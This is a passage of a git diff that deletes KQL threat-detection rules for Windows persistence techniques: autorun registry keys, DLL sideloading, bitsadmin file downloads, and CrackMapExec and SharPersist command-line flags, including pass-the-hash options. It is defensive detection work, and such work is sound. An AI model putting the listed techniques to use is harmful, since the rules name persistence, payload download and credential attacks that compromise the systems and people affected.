RegistryKey contains "\\Authentication\\Credential Providers\\{27FBDB57-B613-4AF2-9D7E-4FA7A66C21AD}")) or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\")) or (RegistryValueData contains "\\AppData\\Local\\Microsoft\\OneDrive\\" and (RegistryValueData startswith "C:\\Windows\\system32\\cmd.exe /q /c rmdir /s /q \"C:\\Users\\" or RegistryValueData startswith "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\")) or (RegistryValueData =~ "C:\\Program Files\\Opera\\assistant\\browser_assistant.exe" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Opera Browser Assistant") or ((RegistryValueData contains "\\AppData\\Local\\Package Cache\\{" and RegistryValueData contains "}\\python-") and RegistryValueData endswith ".exe\" /burn.runonce" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\{") or (RegistryValueData contains "\\Microsoft\\Teams\\Update.exe --processStart " and InitiatingProcessFolderPath endswith "\\Microsoft\\Teams\\current\\Teams.exe") or (RegistryValueData =~ "\"C:\\Program Files\\Zoom\\bin\\installer.exe\" /repair" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\zoommsirepair")))) \ No newline at end of file diff --git a/Persistence/CurrentVersion_NT_Autorun_Keys_Modification.kql b/Persistence/CurrentVersion_NT_Autorun_Keys_Modification.kql deleted file mode 100644 index 93060f91..00000000 --- a/Persistence/CurrentVersion_NT_Autorun_Keys_Modification.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) -// Date: 2019/10/25 -// Level: medium -// Description: Detects modification of autostart extensibility point (ASEP) in registry. -// Tags: attack.persistence, attack.t1547.001 -DeviceRegistryEvents -| where RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion" and (RegistryKey contains "\\Winlogon\\VmApplet" or RegistryKey contains "\\Winlogon\\Userinit" or RegistryKey contains "\\Winlogon\\Taskman" or RegistryKey contains "\\Winlogon\\Shell" or RegistryKey contains "\\Winlogon\\GpExtensions" or RegistryKey contains "\\Winlogon\\AppSetup" or RegistryKey contains "\\Winlogon\\AlternateShells\\AvailableShells" or RegistryKey contains "\\Windows\\IconServiceLib" or RegistryKey contains "\\Windows\\Appinit_Dlls" or RegistryKey contains "\\Image File Execution Options" or RegistryKey contains "\\Font Drivers" or RegistryKey contains "\\Drivers32" or RegistryKey contains "\\Windows\\Run" or RegistryKey contains "\\Windows\\Load") and (not(((InitiatingProcessFolderPath endswith "\\MicrosoftEdgeUpdate.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\Temp\\") or RegistryValueData =~ "(Empty)" or (RegistryKey contains "\\Image File Execution Options" and (RegistryKey endswith "\\DisableExceptionChainValidation" or RegistryKey endswith "\\MitigationOptions")) or ((RegistryKey contains "\\ClickToRunStore\\HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion" or RegistryKey contains "\\ClickToRun\\REGISTRY\\MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion") or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe"))) or (InitiatingProcessFolderPath endswith "\\ngen.exe" and InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework") or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\")) or (RegistryValueData endswith "\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe\"" and RegistryValueData startswith "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\" and InitiatingProcessFolderPath endswith "\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdater\\OneDriveSetup.exe" and RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Delete Cached Update Binary") or ((RegistryValueData in~ ("DWORD (0x00000009)", "DWORD (0x000003c0)")) and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\svchost.exe" and (RegistryKey contains "\\Winlogon\\GPExtensions\\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\\PreviousPolicyAreas" or RegistryKey contains "\\Winlogon\\GPExtensions\\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\\MaxNoGPOListChangesInterval"))))) \ No newline at end of file diff --git a/Persistence/DLL_Load_via_LSASS.kql b/Persistence/DLL_Load_via_LSASS.kql deleted file mode 100644 index 0cc97026..00000000 --- a/Persistence/DLL_Load_via_LSASS.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2019/10/16 -// Level: high -// Description: Detects a method to load DLL via LSASS process using an undocumented Registry key -// Tags: attack.execution, attack.persistence, attack.t1547.008 -DeviceRegistryEvents -| where (RegistryKey contains "\\CurrentControlSet\\Services\\NTDS\\DirectoryServiceExtPt" or RegistryKey contains "\\CurrentControlSet\\Services\\NTDS\\LsaDbExtPt") and (not(((RegistryValueData in~ ("%%systemroot%%\\system32\\ntdsa.dll", "%%systemroot%%\\system32\\lsadb.dll")) and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\lsass.exe"))) \ No newline at end of file diff --git a/Persistence/DLL_Search_Order_Hijackig_Via_Additional_Space_in_Path.kql b/Persistence/DLL_Search_Order_Hijackig_Via_Additional_Space_in_Path.kql deleted file mode 100644 index 056a9e92..00000000 --- a/Persistence/DLL_Search_Order_Hijackig_Via_Additional_Space_in_Path.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: frack113, Nasreddine Bencherchali -// Date: 2022/07/30 -// Level: high -// Description: Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...) -but with a space in order to trick DLL load search order and perform a "DLL Search Order Hijacking" attack - -// Tags: attack.persistence, attack.privilege_escalation, attack.defense_evasion, attack.t1574.002 -DeviceFileEvents -| where FolderPath endswith ".dll" and (FolderPath startswith "C:\\Windows \\" or FolderPath startswith "C:\\Program Files \\" or FolderPath startswith "C:\\Program Files (x86) \\") \ No newline at end of file diff --git a/Persistence/DLL_Sideloading_Of_ShellChromeAPI.DLL.kql b/Persistence/DLL_Sideloading_Of_ShellChromeAPI.DLL.kql deleted file mode 100644 index 29170ff9..00000000 --- a/Persistence/DLL_Sideloading_Of_ShellChromeAPI.DLL.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/12/01 -// Level: high -// Description: Detects processes loading the non-existent DLL "ShellChromeAPI". One known example is the "DeviceEnroller" binary in combination with the "PhoneDeepLink" flag tries to load this DLL. -Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter - -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\ShellChromeAPI.dll" \ No newline at end of file diff --git a/Persistence/Default_RDP_Port_Changed_to_Non_Standard_Port.kql b/Persistence/Default_RDP_Port_Changed_to_Non_Standard_Port.kql deleted file mode 100644 index a620c15a..00000000 --- a/Persistence/Default_RDP_Port_Changed_to_Non_Standard_Port.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: frack113 -// Date: 2022/01/01 -// Level: high -// Description: Detects changes to the default RDP port. -Remote desktop is a common feature in operating systems. It allows a user to log into a remote system using an interactive session with a graphical user interface. -Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS). - -// Tags: attack.persistence, attack.t1547.010 -DeviceRegistryEvents -| where RegistryKey endswith "\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\PortNumber" and (not(RegistryValueData =~ "DWORD (0x00000d3d)")) \ No newline at end of file diff --git a/Persistence/Deny_Service_Access_Using_Security_Descriptor_Tampering_Via_Sc.EXE.kql b/Persistence/Deny_Service_Access_Using_Security_Descriptor_Tampering_Via_Sc.EXE.kql deleted file mode 100644 index 1a09cc4b..00000000 --- a/Persistence/Deny_Service_Access_Using_Security_Descriptor_Tampering_Via_Sc.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Jonhnathan Ribeiro, oscd.community -// Date: 2020/10/16 -// Level: high -// Description: Detects suspicious DACL modifications to deny access to a service that affects critical trustees. This can be used to hide services or make them unstoppable. -// Tags: attack.persistence, attack.t1543.003 -DeviceProcessEvents -| where (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe") and (ProcessCommandLine contains "sdset" and ProcessCommandLine contains "D;") and (ProcessCommandLine contains ";IU" or ProcessCommandLine contains ";SU" or ProcessCommandLine contains ";BA" or ProcessCommandLine contains ";SY" or ProcessCommandLine contains ";WD") \ No newline at end of file diff --git a/Persistence/Direct_Autorun_Keys_Modification.kql b/Persistence/Direct_Autorun_Keys_Modification.kql deleted file mode 100644 index e8025ca6..00000000 --- a/Persistence/Direct_Autorun_Keys_Modification.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community -// Date: 2019/10/25 -// Level: medium -// Description: Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe. -// Tags: attack.persistence, attack.t1547.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "add" and FolderPath endswith "\\reg.exe") and (ProcessCommandLine contains "\\software\\Microsoft\\Windows\\CurrentVersion\\Run" or ProcessCommandLine contains "\\software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit" or ProcessCommandLine contains "\\software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell" or ProcessCommandLine contains "\\software\\Microsoft\\Windows NT\\CurrentVersion\\Windows" or ProcessCommandLine contains "\\software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders" or ProcessCommandLine contains "\\system\\CurrentControlSet\\Control\\SafeBoot\\AlternateShell") \ No newline at end of file diff --git a/Persistence/Enable_Local_Manifest_Installation_With_Winget.kql b/Persistence/Enable_Local_Manifest_Installation_With_Winget.kql deleted file mode 100644 index d6abdc89..00000000 --- a/Persistence/Enable_Local_Manifest_Installation_With_Winget.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/04/17 -// Level: medium -// Description: Detects changes to the AppInstaller (winget) policy. Specifically the activation of the local manifest installation, which allows a user to install new packages via custom manifests. -// Tags: attack.defense_evasion, attack.persistence -DeviceRegistryEvents -| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\AppInstaller\\EnableLocalManifestFiles" \ No newline at end of file diff --git a/Persistence/Enabling_COR_Profiler_Environment_Variables.kql b/Persistence/Enabling_COR_Profiler_Environment_Variables.kql deleted file mode 100644 index 37c43d0b..00000000 --- a/Persistence/Enabling_COR_Profiler_Environment_Variables.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research), Jimmy Bayne (@bohops) -// Date: 2020/09/10 -// Level: medium -// Description: Detects .NET Framework CLR and .NET Core CLR "cor_enable_profiling" and "cor_profiler" variables being set and configured. -// Tags: attack.persistence, attack.privilege_escalation, attack.defense_evasion, attack.t1574.012 -DeviceRegistryEvents -| where (RegistryKey endswith "\\COR_ENABLE_PROFILING" or RegistryKey endswith "\\COR_PROFILER" or RegistryKey endswith "\\CORECLR_ENABLE_PROFILING") or RegistryKey contains "\\CORECLR_PROFILER_PATH" \ No newline at end of file diff --git a/Persistence/Fax_Service_DLL_Search_Order_Hijack.kql b/Persistence/Fax_Service_DLL_Search_Order_Hijack.kql deleted file mode 100644 index 30f379f3..00000000 --- a/Persistence/Fax_Service_DLL_Search_Order_Hijack.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: NVISO -// Date: 2020/05/04 -// Level: high -// Description: The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service. -// Tags: attack.persistence, attack.defense_evasion, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where (FolderPath endswith "ualapi.dll" and InitiatingProcessFolderPath endswith "\\fxssvc.exe") and (not(FolderPath startswith "C:\\Windows\\WinSxS\\")) \ No newline at end of file diff --git a/Persistence/File_Creation_In_Suspicious_Directory_By_Msdt.EXE.kql b/Persistence/File_Creation_In_Suspicious_Directory_By_Msdt.EXE.kql deleted file mode 100644 index 46977716..00000000 --- a/Persistence/File_Creation_In_Suspicious_Directory_By_Msdt.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Vadim Varganov, Florian Roth (Nextron Systems) -// Date: 2022/08/24 -// Level: high -// Description: Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities -// Tags: attack.persistence, attack.t1547.001, cve.2022.30190 -DeviceFileEvents -| where InitiatingProcessFolderPath endswith "\\msdt.exe" and (FolderPath contains "\\Desktop\\" or FolderPath contains "\\Start Menu\\Programs\\Startup\\" or FolderPath contains "C:\\PerfLogs\\" or FolderPath contains "C:\\ProgramData\\" or FolderPath contains "C:\\Users\\Public\\") \ No newline at end of file diff --git a/Persistence/File_Download_Via_Bitsadmin.kql b/Persistence/File_Download_Via_Bitsadmin.kql deleted file mode 100644 index e877ea4a..00000000 --- a/Persistence/File_Download_Via_Bitsadmin.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Michael Haag, FPT.EagleEye -// Date: 2017/03/09 -// Level: medium -// Description: Detects usage of bitsadmin downloading a file -// Tags: attack.defense_evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003 -DeviceProcessEvents -| where (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe") and (ProcessCommandLine contains " /transfer " or ((ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and ProcessCommandLine contains "http")) \ No newline at end of file diff --git a/Persistence/File_Download_Via_Bitsadmin_To_A_Suspicious_Target_Folder.kql b/Persistence/File_Download_Via_Bitsadmin_To_A_Suspicious_Target_Folder.kql deleted file mode 100644 index c7fb9c33..00000000 --- a/Persistence/File_Download_Via_Bitsadmin_To_A_Suspicious_Target_Folder.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/06/28 -// Level: high -// Description: Detects usage of bitsadmin downloading a file to a suspicious target folder -// Tags: attack.defense_evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003 -DeviceProcessEvents -| where (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (ProcessCommandLine contains ":\\Perflogs" or ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "%ProgramData%" or ProcessCommandLine contains "%public%") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe") \ No newline at end of file diff --git a/Persistence/File_Download_Via_Bitsadmin_To_An_Uncommon_Target_Folder.kql b/Persistence/File_Download_Via_Bitsadmin_To_An_Uncommon_Target_Folder.kql deleted file mode 100644 index 7c74c2ea..00000000 --- a/Persistence/File_Download_Via_Bitsadmin_To_An_Uncommon_Target_Folder.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/06/28 -// Level: medium -// Description: Detects usage of bitsadmin downloading a file to uncommon target folder -// Tags: attack.defense_evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003 -DeviceProcessEvents -| where (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (ProcessCommandLine contains "%AppData%" or ProcessCommandLine contains "%temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "C:\\Windows\\Temp\\") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe") \ No newline at end of file diff --git a/Persistence/File_With_Suspicious_Extension_Downloaded_Via_Bitsadmin.kql b/Persistence/File_With_Suspicious_Extension_Downloaded_Via_Bitsadmin.kql deleted file mode 100644 index 03b37b13..00000000 --- a/Persistence/File_With_Suspicious_Extension_Downloaded_Via_Bitsadmin.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/06/28 -// Level: high -// Description: Detects usage of bitsadmin downloading a file with a suspicious extension -// Tags: attack.defense_evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003 -DeviceProcessEvents -| where (ProcessCommandLine contains ".7z" or ProcessCommandLine contains ".asax" or ProcessCommandLine contains ".ashx" or ProcessCommandLine contains ".asmx" or ProcessCommandLine contains ".asp" or ProcessCommandLine contains ".aspx" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".cfm" or ProcessCommandLine contains ".cgi" or ProcessCommandLine contains ".chm" or ProcessCommandLine contains ".cmd" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".gif" or ProcessCommandLine contains ".jpeg" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".jsp" or ProcessCommandLine contains ".jspx" or ProcessCommandLine contains ".log" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".ps1" or ProcessCommandLine contains ".psm1" or ProcessCommandLine contains ".rar" or ProcessCommandLine contains ".scf" or ProcessCommandLine contains ".sct" or ProcessCommandLine contains ".txt" or ProcessCommandLine contains ".vbe" or ProcessCommandLine contains ".vbs" or ProcessCommandLine contains ".war" or ProcessCommandLine contains ".wsf" or ProcessCommandLine contains ".wsh" or ProcessCommandLine contains ".xll" or ProcessCommandLine contains ".zip") and (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe") \ No newline at end of file diff --git a/Persistence/HackTool_-_CrackMapExec_Execution.kql b/Persistence/HackTool_-_CrackMapExec_Execution.kql deleted file mode 100644 index 2272759d..00000000 --- a/Persistence/HackTool_-_CrackMapExec_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/02/25 -// Level: high -// Description: This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced. -// Tags: attack.execution, attack.persistence, attack.privilege_escalation, attack.credential_access, attack.discovery, attack.t1047, attack.t1053, attack.t1059.003, attack.t1059.001, attack.t1110, attack.t1201 -DeviceProcessEvents -| where (FolderPath endswith "\\crackmapexec.exe" or (ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -x ") or (ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " -H 'NTHASH'") or (ProcessCommandLine contains " mssql " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " -M " and ProcessCommandLine contains " -d ") or (ProcessCommandLine contains " smb " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -H " and ProcessCommandLine contains " -M " and ProcessCommandLine contains " -o ") or (ProcessCommandLine contains " smb " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " --local-auth") or ProcessCommandLine contains " -M pe_inject ") or ((ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p ") and (ProcessCommandLine contains " 10." and ProcessCommandLine contains " 192.168." and ProcessCommandLine contains "/24 ")) \ No newline at end of file diff --git a/Persistence/HackTool_-_SharPersist_Execution.kql b/Persistence/HackTool_-_SharPersist_Execution.kql deleted file mode 100644 index 75962c94..00000000 --- a/Persistence/HackTool_-_SharPersist_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/09/15 -// Level: high -// Description: Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms -// Tags: attack.persistence, attack.t1053 -DeviceProcessEvents -| where (ProcessCommandLine contains " -t schtask -c " or ProcessCommandLine contains " -t startupfolder -c ") or (ProcessCommandLine contains " -t reg -c " and ProcessCommandLine contains " -m add") or (ProcessCommandLine contains " -t service -c " and ProcessCommandLine contains " -m add") or (ProcessCommandLine contains " -t schtask -c " and ProcessCommandLine contains " -m add") or (FolderPath endswith "\\SharPersist.exe" or ProcessVersionInfoProductName =~ "SharPersist") \ No newline at end of file diff --git a/Persistence/IE_Change_Domain_Zone.kql b/Persistence/IE_Change_Domain_Zone.kql deleted file mode 100644 index b4770567..00000000 --- a/Persistence/IE_Change_Domain_Zone.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/01/22 -// Level: medium -// Description: Hides the file extension through modification of the registry -// Tags: attack.persistence, attack.t1137 -DeviceRegistryEvents -| where RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\Domains" and (not((RegistryValueData in~ ("DWORD (0x00000000)", "DWORD (0x00000001)", "(Empty)")))) \ No newline at end of file diff --git a/Persistence/IIS_Native-Code_Module_Command_Line_Installation.kql b/Persistence/IIS_Native-Code_Module_Command_Line_Installation.kql deleted file mode 100644 index 0213abe5..00000000 --- a/Persistence/IIS_Native-Code_Module_Command_Line_Installation.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2019/12/11 -// Level: medium -// Description: Detects suspicious IIS native-code module installations via command line -// Tags: attack.persistence, attack.t1505.003 -DeviceProcessEvents -| where (((ProcessCommandLine contains "install" and ProcessCommandLine contains "module") and (ProcessCommandLine contains "-name:" or ProcessCommandLine contains "/name:")) and (FolderPath endswith "\\appcmd.exe" or ProcessVersionInfoOriginalFileName =~ "appcmd.exe")) and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\inetsrv\\iissetup.exe")) \ No newline at end of file diff --git a/Persistence/Internet_Explorer_Autorun_Keys_Modification.kql b/Persistence/Internet_Explorer_Autorun_Keys_Modification.kql deleted file mode 100644 index 5016e92a..00000000 --- a/Persistence/Internet_Explorer_Autorun_Keys_Modification.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) -// Date: 2019/10/25 -// Level: medium -// Description: Detects modification of autostart extensibility point (ASEP) in registry. -// Tags: attack.persistence, attack.t1547.001 -DeviceRegistryEvents -| where (RegistryKey contains "\\Software\\Wow6432Node\\Microsoft\\Internet Explorer" or RegistryKey contains "\\Software\\Microsoft\\Internet Explorer") and (RegistryKey contains "\\Toolbar" or RegistryKey contains "\\Extensions" or RegistryKey contains "\\Explorer Bars") and (not((RegistryValueData =~ "(Empty)" or (RegistryKey contains "\\Extensions\\{2670000A-7350-4f3c-8081-5663EE0C6C49}" or RegistryKey contains "\\Extensions\\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}" or RegistryKey contains "\\Extensions\\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}" or RegistryKey contains "\\Extensions\\{A95fe080-8f5d-11d2-a20b-00aa003c157a}") or (RegistryKey endswith "\\Toolbar\\ShellBrowser\\ITBar7Layout" or RegistryKey endswith "\\Toolbar\\ShowDiscussionButton" or RegistryKey endswith "\\Toolbar\\Locked")))) \ No newline at end of file diff --git a/Persistence/Leviathan_Registry_Key_Activity.kql b/Persistence/Leviathan_Registry_Key_Activity.kql deleted file mode 100644 index 2ebd1443..00000000 --- a/Persistence/Leviathan_Registry_Key_Activity.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Aidan Bracher -// Date: 2020/07/07 -// Level: critical -// Description: Detects registry key used by Leviathan APT in Malaysian focused campaign -// Tags: attack.persistence, attack.t1547.001 -DeviceRegistryEvents -| where RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ntkd" \ No newline at end of file diff --git a/Persistence/MSExchange_Transport_Agent_Installation.kql b/Persistence/MSExchange_Transport_Agent_Installation.kql deleted file mode 100644 index 734a09ec..00000000 --- a/Persistence/MSExchange_Transport_Agent_Installation.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Tobias Michalski (Nextron Systems) -// Date: 2021/06/08 -// Level: medium -// Description: Detects the Installation of a Exchange Transport Agent -// Tags: attack.persistence, attack.t1505.002 -DeviceProcessEvents -| where ProcessCommandLine contains "Install-TransportAgent" \ No newline at end of file diff --git a/Persistence/Malicious_DLL_File_Dropped_in_the_Teams_or_OneDrive_Folder.kql b/Persistence/Malicious_DLL_File_Dropped_in_the_Teams_or_OneDrive_Folder.kql deleted file mode 100644 index a55dc381..00000000 --- a/Persistence/Malicious_DLL_File_Dropped_in_the_Teams_or_OneDrive_Folder.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: frack113 -// Date: 2022/08/12 -// Level: high -// Description: Detects creation of a malicious DLL file in the location where the OneDrive or Team applications -Upon execution of the Teams or OneDrive application, the dropped malicious DLL file ("iphlpapi.dll") is sideloaded - -// Tags: attack.persistence, attack.privilege_escalation, attack.defense_evasion, attack.t1574.002 -DeviceFileEvents -| where FolderPath contains "iphlpapi.dll" and FolderPath contains "\\AppData\\Local\\Microsoft" \ No newline at end of file diff --git a/Persistence/Microsoft_Office_DLL_Sideload.kql b/Persistence/Microsoft_Office_DLL_Sideload.kql deleted file mode 100644 index 7003f77d..00000000 --- a/Persistence/Microsoft_Office_DLL_Sideload.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) -// Date: 2022/08/17 -// Level: high -// Description: Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\outllib.dll" and (not((FolderPath startswith "C:\\Program Files\\Microsoft Office\\OFFICE" or FolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\OFFICE" or FolderPath startswith "C:\\Program Files\\Microsoft Office\\Root\\OFFICE" or FolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\Root\\OFFICE"))) \ No newline at end of file diff --git a/Persistence/Modify_User_Shell_Folders_Startup_Value.kql b/Persistence/Modify_User_Shell_Folders_Startup_Value.kql deleted file mode 100644 index 7fba55a2..00000000 --- a/Persistence/Modify_User_Shell_Folders_Startup_Value.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/10/01 -// Level: high -// Description: Detect modification of the startup key to a path where a payload could be stored to be launched during startup -// Tags: attack.persistence, attack.privilege_escalation, attack.t1547.001 -DeviceRegistryEvents -| where RegistryKey contains "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders" and RegistryKey endswith "Startup" \ No newline at end of file diff --git a/Persistence/Narrator_s_Feedback-Hub_Persistence.kql b/Persistence/Narrator_s_Feedback-Hub_Persistence.kql deleted file mode 100644 index 249e40b4..00000000 --- a/Persistence/Narrator_s_Feedback-Hub_Persistence.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Dmitriy Lifanov, oscd.community -// Date: 2019/10/25 -// Level: high -// Description: Detects abusing Windows 10 Narrator's Feedback-Hub -// Tags: attack.persistence, attack.t1547.001 -DeviceRegistryEvents -| where (ActionType =~ "DeleteValue" and RegistryKey endswith "\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\Shell\\open\\command\\DelegateExecute") or RegistryKey endswith "\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\Shell\\open\\command\\(Default)" \ No newline at end of file diff --git a/Persistence/New_ActiveScriptEventConsumer_Created_Via_Wmic.EXE.kql b/Persistence/New_ActiveScriptEventConsumer_Created_Via_Wmic.EXE.kql deleted file mode 100644 index 5b941e28..00000000 --- a/Persistence/New_ActiveScriptEventConsumer_Created_Via_Wmic.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2021/06/25 -// Level: high -// Description: Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence -// Tags: attack.persistence, attack.t1546.003 -DeviceProcessEvents -| where ProcessCommandLine contains "ActiveScriptEventConsumer" and ProcessCommandLine contains " CREATE " \ No newline at end of file diff --git a/Persistence/New_Custom_Shim_Database_Created.kql b/Persistence/New_Custom_Shim_Database_Created.kql deleted file mode 100644 index 5ffd2880..00000000 --- a/Persistence/New_Custom_Shim_Database_Created.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: frack113, Nasreddine 